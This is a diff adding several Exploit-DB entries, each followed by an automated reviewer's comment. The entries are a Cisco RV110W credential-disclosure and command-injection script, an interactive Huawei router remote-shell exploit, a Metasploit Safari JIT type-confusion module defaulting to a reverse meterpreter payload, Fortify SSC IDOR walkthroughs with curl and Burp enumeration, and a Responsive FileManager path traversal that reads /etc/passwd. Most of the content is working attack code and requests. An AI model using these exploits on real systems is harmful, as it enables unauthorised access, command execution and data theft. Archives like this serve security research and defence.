diff --git a/exploits/hardware/remote/45986.py b/exploits/hardware/remote/45986.py
new file mode 100755
index 000000000..6ac872869
--- /dev/null
+++ b/exploits/hardware/remote/45986.py
@@ -0,0 +1,98 @@
+#!/usr/bin/env python2
+
+#####
+## Cisco RV110W Password Disclosure and OS Command Execute.
+### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
+
+# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
+# Date: 2018-08
+# Exploit Author: RySh
+# Vendor Homepage: https://www.cisco.com/
+# Version: 1.1.0.9
+# Tested on: RV110W 1.1.0.9
+# CVE : CVE-2014-0683, CVE-2015-6396
+
+import os
+import sys
+import re
+import urllib
+import urllib2
+import getopt
+import json
+
+import ssl
+
+ssl._create_default_https_context = ssl._create_unverified_context
+
+###
+# Usage: ./{script_name} 192.168.1.1 443 "reboot"
+###
+
+if __name__ == "__main__":
+ IP = argv[1]
+ PORT = argv[2]
+ CMD = argv[3]
+
+ # Get session key, Just access index page.
+ url = 'https://' + IP + ':' + PORT + '/'
+ req = urllib2.Request(url)
+ result = urllib2.urlopen(req)
+ res = result.read()
+
+ # parse 'admin_pwd'! -- Get credits
+ admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
+ admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
+ print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
+
+ # Get session_id by POST
+ req2 = urllib2.Request(url + "login.cgi")
+ req2.add_header('Origin', url)
+ req2.add_header('Upgrade-Insecure-Requests', 1)
+ req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
+ req2.add_header('User-Agent',
+ 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
+ req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
+ req2.add_header('Referer', url)
+ req2.add_header('Accept-Encoding', 'gzip, deflate')
+ req2.add_header('Accept-Language', 'en-US,en;q=0.9')
+ req2.add_header('Cookie', 'SessionID=')
+ data = {"submit_button": "login",
+ "submit_type": "",
+ "gui_action": "",
+ "wait_time": "0",
+ "change_action": "",
+ "enc": "1",
+ "user": admin_user,
+ "pwd": admin_pwd,
+ "sel_lang": "EN"
+ }
+ r = urllib2.urlopen(req2, urllib.urlencode(data))
+ resp = r.read()
+ login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
+ session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
+
+ # Execute your commands via diagnose command parameter, default command is `reboot`
+ req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
+ req3.add_header('Origin', url)
+ req3.add_header('Upgrade-Insecure-Requests', 1)
+ req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
+ req3.add_header('User-Agent',
+ 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
+ req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
+ req3.add_header('Referer', url)
+ req3.add_header('Accept-Encoding', 'gzip, deflate')
+ req3.add_header('Accept-Language', 'en-US,en;q=0.9')
+ req3.add_header('Cookie', 'SessionID=')
+ data_cmd = {"submit_button": "Diagnostics",
+ "change_action": "gozila_cgi",
+ "submit_type": "start_ping",
+ "gui_action": "",
+ "traceroute_ip": "",
+ "commit": "1",
+ "ping_times": "3 |" + CMD + "|",
+ "ping_size": "64",
+ "wait_time": "4",
+ "ping_ip": "127.0.0.1",
+ "lookup_name": ""
+ }
+ r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
\ No newline at end of file
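Review bot: The assignment `ssl._create_default_https_context = ssl._create_unverified_context` near the top of the new file turns off certificate verification for every HTTPS request the process makes, through a private `ssl` attribute, and nothing in the file says so. A comment above it such as `# NOTE: disables TLS certificate verification for every HTTPS request in this process` would make the side effect explicit. The header also lists CVE-2014-0683 and CVE-2015-6396 without saying which step each one covers or which firmware release fixes them. Going by the inline comments, the first appears to be the `admin_pwd` value read from the index page and the second the `ping_times` field posted to `apply.cgi`; stating that mapping would tell defenders which requests to look for in device and proxy logs.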
diff --git a/exploits/hardware/webapps/45991.py b/exploits/hardware/webapps/45991.py
new file mode 100755
index 000000000..18878c74d
--- /dev/null
+++ b/exploits/hardware/webapps/45991.py
@@ -0,0 +1,51 @@
+#!/bin/python
+'''
+ Author : Rebellion
+ Github : @rebe11ion
+ Twitter : @rebellion
+'''
+
+import urllib2,requests,os,sys
+from requests.auth import HTTPDigestAuth
+DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
+DEFAULT_TIMEOUT = 5
+def fetch_url(url):
+ global DEFAULT_HEADERS, DEFAULT_TIMEOUT
+ request = urllib2.Request(url, headers=DEFAULT_HEADERS)
+ data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
+ return data
+
+def exploit(ip, path):
+ url = "http://%s:37215/icon/../../../%s" % (ip, path)
+ data = fetch_url(url)
+ return data
+
+def main():
+ pwd = "/"
+ cmd_path = "/tmp/ccmd"
+ pwd_path = "/tmp/cpwd"
+ while True:
+ targetip = sys.argv[1]
+ cmd_ = raw_input("[{}]$ ".format(pwd))
+ cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)
+ rm = "\n \n \n $(" + cmd + ")\n$(echo HUAWEIUPNP)\n\n \n "
+ url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"
+ requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
+ assert cmd_path.startswith("/"), "An absolute path is required"
+ data = exploit(targetip, cmd_path)
+ open(cmd_path,"wb").write(data)
+ if "cd" in cmd_:
+ pass
+ elif "clear" in cmd_:
+ os.system("clear")
+ elif "cat" in cmd_:
+ os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))
+ else:
+ if "|" in cmd_:
+ os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))
+ else:
+ os.system("cat {}".format(cmd_path))
+ pwd = exploit(targetip,pwd_path).strip("\n")
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
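Review bot: `open(cmd_path,"wb").write(data)` in `main()` writes bytes returned by the remote device to the fixed path `/tmp/ccmd` on the machine running the script, and the `os.system("cat ...")` calls that follow print them to the terminal through a local shell. On a shared analysis host another user can pre-create or symlink a predictable name in `/tmp`, and the handle is never closed; a private file from `tempfile.mkstemp()` written inside a `with` block avoids both. The `assert cmd_path.startswith("/")` line is not a real check, since asserts are stripped under `python -O` and the value is a constant. The module docstring names only the author, so the affected device, firmware and advisory reference (`<advisory id>`) should be added there.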
diff --git a/exploits/macos/remote/45998.rb b/exploits/macos/remote/45998.rb
new file mode 100755
index 000000000..80f916705
--- /dev/null
+++ b/exploits/macos/remote/45998.rb
@@ -0,0 +1,510 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ManualRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Safari Proxy Object Type Confusion',
+ 'Description' => %q{
+ This module exploits a type confusion bug in the Javascript Proxy object in
+ WebKit. The DFG JIT does not take into account that, through the use of a Proxy,
+ it is possible to run arbitrary JS code during the execution of a CreateThis
+ operation. This makes it possible to change the structure of e.g. an argument
+ without causing a bailout, leading to a type confusion (CVE-2018-4233).
+
+ The JIT region is then replaced with shellcode which loads the second stage.
+ The second stage exploits a logic error in libxpc, which uses command execution
+ via the launchd's "spawn_via_launchd" API (CVE-2018-4404).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'saelo' ],
+ 'References' => [
+ ['CVE', '2018-4233'],
+ ['CVE', '2018-4404'],
+ ['URL', 'https://github.com/saelo/cve-2018-4233'],
+ ['URL', 'https://github.com/saelo/pwn2own2018'],
+ ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],
+ ],
+ 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],
+ 'Platform' => 'osx',
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },
+ 'Targets' => [
+ [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+ [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+ ],
+ 'DisclosureDate' => 'Mar 15 2018'))
+ register_advanced_options([
+ OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information in the exploit javascript", false]),
+ ])
+ end
+
+ def offset_table
+ {
+ '10.12.6' => {
+ :jsc_vtab => '0x0000d8d8',
+ :dyld_stub_loader => '0x00001168',
+ :dlopen => '0x000027f7',
+ :confstr => '0x00002c84',
+ :strlen => '0x00001b40',
+ :strlen_got => '0xdc0',
+ },
+ '10.13' => {
+ :jsc_vtab => '0x0000e5f8',
+ :dyld_stub_loader => '0x000012a8',
+ :dlopen => '0x00002e60',
+ :confstr => '0x000024fc',
+ :strlen => '0x00001440',
+ :strlen_got => '0xee8',
+ },
+ '10.13.3' => {
+ :jsc_vtab => '0xe5e8',
+ :dyld_stub_loader => '0x1278',
+ :dlopen => '0x2e30',
+ :confstr => '0x24dc',
+ :strlen => '0x1420',
+ :strlen_got => '0xee0',
+ },
+ }
+ end
+
+ def exploit_data(directory, file)
+ path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
+ ::File.binread path
+ end
+
+ def stage1_js
+ stage1 = exploit_data "CVE-2018-4233", "stage1.bin"
+ "var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);"
+ end
+
+ def stage2_js
+ stage2 = exploit_data "CVE-2018-4404", "stage2.dylib"
+ payload_cmd = payload.raw
+ if target['Arch'] == ARCH_PYTHON
+ payload_cmd = "echo \"#{payload_cmd}\" | python"
+ end
+ placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')
+ stage2[placeholder_index, payload_cmd.length] = payload_cmd
+ "var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);"
+ end
+
+ def get_offsets(user_agent)
+ if user_agent =~ /Intel Mac OS X (.*?)\)/
+ version = $1.gsub("_", ".")
+ mac_osx_version = Gem::Version.new(version)
+ if mac_osx_version >= Gem::Version.new('10.13.4')
+ print_warning "macOS version #{mac_osx_version} is not vulnerable"
+ elsif mac_osx_version < Gem::Version.new('10.12')
+ print_warning "macOS version #{mac_osx_version} is not vulnerable"
+ elsif offset_table.key?(version)
+ offset = offset_table[version]
+ return <<-EOF
+const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
+const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
+const DLOPEN_OFFSET = #{offset[:dlopen]};
+const CONFSTR_OFFSET = #{offset[:confstr]};
+const STRLEN_OFFSET = #{offset[:strlen]};
+const STRLEN_GOT_OFFSET = #{offset[:strlen_got]};
+EOF
+ else
+ print_warning "No offsets for version #{mac_osx_version}"
+ end
+ else
+ print_warning "Unexpected User-Agent"
+ end
+ return false
+ end
+
+ def on_request_uri(cli, request)
+ user_agent = request['User-Agent']
+ print_status("Request from #{user_agent}")
+ offsets = get_offsets(user_agent)
+ unless offsets
+ send_not_found(cli)
+ return
+ end
+
+ utils = exploit_data "CVE-2018-4233", "utils.js"
+ int64 = exploit_data "CVE-2018-4233", "int64.js"
+ html = %Q^
+
+
+
+
+
+ ^
+ unless datastore['DEBUG_EXPLOIT']
+ html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '')
+ end
+ send_response(cli, html, {'Content-Type'=>'text/html'})
+ end
+
+end
\ No newline at end of file
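Review bot: The version limits that `get_offsets` enforces are not stated anywhere in the module metadata: it reports macOS 10.13.4 and later, and anything below 10.12, as not vulnerable, and `offset_table` has entries only for 10.12.6, 10.13 and 10.13.3. The 'Description' text should carry that range so a reader can tell patched hosts from unpatched ones without reading the code, for example `Affects macOS 10.12 up to 10.13.3; 10.13.4 and later are treated as not vulnerable.` A short comment on `offset_table` saying which binary the offsets are relative to would also help, since the hash gives no hint. The HTML template in `on_request_uri` is empty as shown on this page, so `utils` and `int64` look unused here; that is probably an artifact of how the page was captured.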
diff --git a/exploits/multiple/webapps/45989.txt b/exploits/multiple/webapps/45989.txt
new file mode 100644
index 000000000..522d643e2
--- /dev/null
+++ b/exploits/multiple/webapps/45989.txt
@@ -0,0 +1,185 @@
+Details
+================
+Software: Fortify SSC (Software Security Center)
+Version: 17.10, 17.20 & 18.10
+Homepage: https://www.microfocus.com
+Advisory report: https://github.com/alt3kx/CVE-2018-7690
+CVE: CVE-2018-7690
+CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
+CWE-639
+
+Description
+================
+Fortify SSC (Software Security Center) REST-API contain Insecure direct object references (IDOR) allowing reading arbitrary details of other user's
+Fortify projects via GET method
+
+Vulnerability
+================
+Fortify SSC (Software Security Center) 7.10, does not properly check ownership of projects, which allows remote authenticated (view-only) users
+to read arbitrary details via API projects ID parameter to /api/v1/projects/{NUMBER}
+
+Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.
+
+Proof of concept
+================
+
+Pre-requisites:
+
+- curl command deployed (Windows or Linux)
+- jq command deployed (for parsing JSON fields), (Windows or Linux)
+- Burpsuite Free/Pro deployed or any other Proxy to catch/send the request (optional)
+
+Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),
+
+The URL normally is avaiable as following:
+
+Target: https://fortifyserver.com/ssc/#/
+
+Step (2): Once logged extract the Cookie field, the formmat normallly as following: "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
+Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default
+
+Step (4): The offending GET is:
+
+GET /ssc/api/v1/projects/2 HTTP/1.1
+Host: fortifyserver.com
+Connection: close
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;
+
+Step (5): Test the first GET (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:
+
+# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/2
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
+-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF"
+--proxy http://127.0.0.1:8080 | jq '.data'
+
+You should see the following response project details:
+
+{
+ "createdBy": "admin",
+ "name": "Project Name Here",
+ "description": "",
+ "id": 2,
+ "creationDate": "2012-08-03T09:43:36.000+0000",
+ "issueTemplateId": null
+}
+
+Step (6): Now extract all the projects details registered into Fortify SSC server:
+
+Payload: https://fortifyserver.com/ssc/api/v1/projects/{NUMBER} , and change the number as following:
+
+# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/5
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
+-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF"
+--proxy http://127.0.0.1:8080 | jq '.data'
+
+You should see other project details available as following:
+
+{
+"createdBy": "alex",
+"name": "Project Name Here",
+"description": "",
+"id": 5,
+"creationDate": "2012-09-21T09:35:16.000+0000",
+"issueTemplateId": null
+}
+
+Step (7): Automate with BurpSuite Pro/Free choose:
+
+Payload Positions: "Intruder Tab -> Positions" highlight as following:
+
+-> /ssc/api/v1/projects/§1§
+
+Payloads set: "Intruder Tab -> Payloads" with the following data:
+
+-> Payload set: 1
+
+-> Payload type: Numbers
+
+Payload Options [Numbers]:
+
+-> Type: Sequential
+
+-> From: 0
+
+-> To: 1500
+
+-> Step: 1
+
+Then start attack...
+
+Have fun!
+
+Mitigations
+================
+Install the latest patches availabe here:
+https://softwaresupport.softwaregrp.com/doc/KM03298201
+
+Disclosure policy
+================
+We believes in responsible disclosure.
+Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
+
+This vulnerability will be published if we do not receive a response to this report with 10 days.
+
+Timeline
+================
+
+2018-05-24: Discovered
+2018-05-25: Retest PRO environment
+2018-05-31: Vendor notification, two issues found
+2018-05-31: Vendor feedback received
+2018-06-01: Internal communication
+2018-06-01: Vendor feedback, two issues are confirmed
+2018-06-05: Vendor notification, new issue found
+2018-06-06: Vendor feedback, evaluating High submission
+2018-06-08: Vendor feedback, High issue is confirmed
+2018-06-19: Researcher, reminder sent
+2018-06-22: Vendor feedback, summary of CVEs handled as official way
+2018-06-26: Vendor feedback, official Hotfix for High issue available to test
+2018-06-29: Researcher feedback
+2018-07-02: Researcher feedback
+2018-07-04: Researcher feedback, Hotfix tested on QA environment
+2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
+2018-08-02: Reminder to vendor, feedback received OK!
+2018-09-26: Reminder to vendor, feedback received OK!
+2018-09-26: Fixes received from the vendor
+2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Feedback from the vendor, technical details provided to the researcher
+2018-10-16: Fixes now tested on QA environment
+2018-11-08: Reminder received from the vendor, feedback provided by researcher
+2018-11-09: Re-rest fixes on QA environment
+2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
+2018-11-21: Researcher feedback
+2018-11-23: Fixes working well/confirmed by researcher
+2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
+2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
+2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
+2018-12-12: Public report
+
+Discovered by:
+Alex Hernandez aka alt3kx:
+================
+Please visit https://github.com/alt3kx for more information.
+
+My current exploit list @exploit-db:
+https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
\ No newline at end of file
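Review bot: The "Vulnerability" paragraph gives the affected release as `7.10`, while "Details" and Step (1) say 17.10, 17.20 and 18.10, so the sentence should begin `Fortify SSC (Software Security Center) 17.10, does not properly check ownership of projects`. The "Mitigations" section only links to the vendor document and names no fixed release; the timeline mentions retesting the fixes with SSC 18.20, so if that is the fixed version it should be stated there. The sample requests carry what looks like a real `JSESSIONID` and a registrable hostname; a marked placeholder such as `JSESSIONID=<session-id>` and a reserved name like `ssc.example.com` would be safer. The cookie and hostname remarks apply equally to exploits/multiple/webapps/45990.txt.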
diff --git a/exploits/multiple/webapps/45990.txt b/exploits/multiple/webapps/45990.txt
new file mode 100644
index 000000000..d619a39d1
--- /dev/null
+++ b/exploits/multiple/webapps/45990.txt
@@ -0,0 +1,185 @@
+Details
+================
+Software: Fortify SSC (Software Security Center)
+Version: 17.10, 17.20 & 18.10
+Homepage: https://www.microfocus.com
+Advisory report: https://github.com/alt3kx/CVE-2018-7691
+CVE: CVE-2018-7691
+CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
+CWE-639
+
+Description
+================
+REST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method
+
+Vulnerability
+================
+Fortify SSC (Software Security Center) 17.10, does not properly check ownership of "authEntities", which allows remote authenticated (view-only) users
+to read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities
+
+Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.
+
+Proof of concept
+================
+
+Pre-requisites:
+
+- Curl command deployed (Windows or Linux)
+- jq command deployed (for parsing JSON fields), (Windows or Linux)
+- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)
+
+Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),
+
+The URL normally is avaiable as following:
+
+Target: https://fortifyserver.com/ssc/#/
+
+Step (2): Once logged extract the Cookie field, the format normally as following: "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default
+
+Step (4): The offending POST is:
+
+POST /ssc/api/v1/bulk HTTP/1.1
+Host: fortifyserver.com
+Connection: close
+Accept: application/json, text/plain, */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;
+Content-Length: 123
+
+{"requests":[{"uri":"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a
+
+Step (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:
+
+# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "Accept: application/json, text/plain, */*"
+-H "X-Requested-With: XMLHttpRequest"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Content-Type: application/json;charset=UTF-8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
+--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'
+
+You should see the following response:
+
+200
+
+Step (6): Now extract all local and LDAP users registered into Fortify SSC server:
+
+Payload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field "--data-binary" below and change the number as following:
+
+# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "Accept: application/json, text/plain, */*"
+-H "X-Requested-With: XMLHttpRequest"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Content-Type: application/json;charset=UTF-8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+--data-binary "{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a"
+--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'
+
+You should see the following response with users available
+
+"admin"
+"sca"
+"alex"
+
+[../snip]
+
+Step (7): Automate with BurpSuite Pro/Free choose:
+
+Payload Positions: "Intruder Tab -> Positions" highlight as following:
+
+-> /api/v1/projectVersions/§1§/authEntities
+
+Payloads set: "Intruder Tab -> Payloads" with the following data:
+
+-> Payload set: 1
+
+-> Payload type: Numbers
+
+Payload Options [Numbers]:
+
+-> Type: Sequential
+
+-> From: 0
+
+-> To: 1500
+
+-> Step: 1
+
+Then start attack…
+Have fun!
+
+Have fun!
+
+Mitigations
+================
+Install the latest patches availabe here:
+https://softwaresupport.softwaregrp.com/doc/KM03298201
+
+Disclosure policy
+================
+We believes in responsible disclosure.
+Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
+
+This vulnerability will be published if we do not receive a response to this report with 10 days.
+
+Timeline
+================
+
+2018-05-24: Discovered
+2018-05-25: Retest PRO environment
+2018-05-31: Vendor notification, two issues found
+2018-05-31: Vendor feedback received
+2018-06-01: Internal communication
+2018-06-01: Vendor feedback, two issues are confirmed
+2018-06-05: Vendor notification, new issue found
+2018-06-06: Vendor feedback, evaluating High submission
+2018-06-08: Vendor feedback, High issue is confirmed
+2018-06-19: Researcher, reminder sent
+2018-06-22: Vendor feedback, summary of CVEs handled as official way
+2018-06-26: Vendor feedback, official Hotfix for High issue available to test
+2018-06-29: Researcher feedback
+2018-07-02: Researcher feedback
+2018-07-04: Researcher feedback, Hotfix tested on QA environment
+2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
+2018-08-02: Reminder to vendor, feedback received OK!
+2018-09-26: Reminder to vendor, feedback received OK!
+2018-09-26: Fixes received from the vendor
+2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Feedback from the vendor, technical details provided to the researcher
+2018-10-16: Fixes now tested on QA environment
+2018-11-08: Reminder received from the vendor, feedback provided by researcher
+2018-11-09: Re-rest fixes on QA environment
+2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
+2018-11-21: Researcher feedback
+2018-11-23: Fixes working well/confirmed by researcher
+2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
+2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
+2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
+2018-12-12: Public report
+
+Discovered by:
+Alex Hernandez aka alt3kx:
+================
+Please visit https://github.com/alt3kx for more information.
+
+My current exploit list @exploit-db:
+https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
\ No newline at end of file
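Review bot: The "Mitigations" section does not tell defenders that the enumerated object ID never appears in the request line: as Step (4) shows, the `projectVersions/{NUMBER}/authEntities` URI travels inside the JSON body of `POST /ssc/api/v1/bulk`. Access logs that record only method and path will therefore show repeated identical POSTs, so the section should add a line such as `Detection: review /api/v1/bulk request bodies (or application audit logs) for view-only accounts iterating projectVersions IDs`. "Have fun!" is also printed twice before the Mitigations heading.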
diff --git a/exploits/php/webapps/43593.py b/exploits/php/webapps/43593.txt
old mode 100755
new mode 100644
similarity index 100%
rename from exploits/php/webapps/43593.py
rename to exploits/php/webapps/43593.txt
diff --git a/exploits/php/webapps/45987.txt b/exploits/php/webapps/45987.txt
new file mode 100644
index 000000000..b79b82e16
--- /dev/null
+++ b/exploits/php/webapps/45987.txt
@@ -0,0 +1,99 @@
+Responsive FileManager 9.13.4 - Multiple Vulnerabilities
+
+Date:
+ December 12, 2018
+
+Author:
+ farisv
+
+Vendor Homepage:
+ https://www.responsivefilemanager.com/
+
+Vulnerable Package Link:
+ https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.4/responsive_filemanager.zip
+
+
+Responsive FileManager is a free open-source file manager and image manager made with the jQuery library, CSS3, PHP and HTML5 that offers a nice and elegant way to upload and insert files, images and videos.
+You can use it as external plugin for TinyMCE version 4.x (and older), CKEditor CLEditor, or you can also use it as a stand-alone file manager to manage and select files.
+
+The following are the vulnerabilities found before v 9.14.0.
+
+1. Arbitrary file read via path traversal with `path` parameter through `get_file` action in ajax_calls.php.
+
+$ curl -X POST -d "path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=get_file&sub_action=edit&preview_mode=text"
+%
+
+2. Arbitrary file read via path traversal with `path` parameter through `copy_cut` action in ajax_calls.php and `paste_clipboard` action in execute.php.
+
+# Copy/cut the file with directory traversal so the desired file path will be saved to the session.
+$ curl -X POST -d "sub_action=copy&path=../../../../../../../etc/passwd" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/ajax_calls.php?action=copy_cut"
+
+# Paste the clipboard
+$ curl -X POST -d "path=" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=paste_clipboard"
+
+# File is in the `upload_dir` folder or in the dialog page.
+$ curl http://localhost:1111/source/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
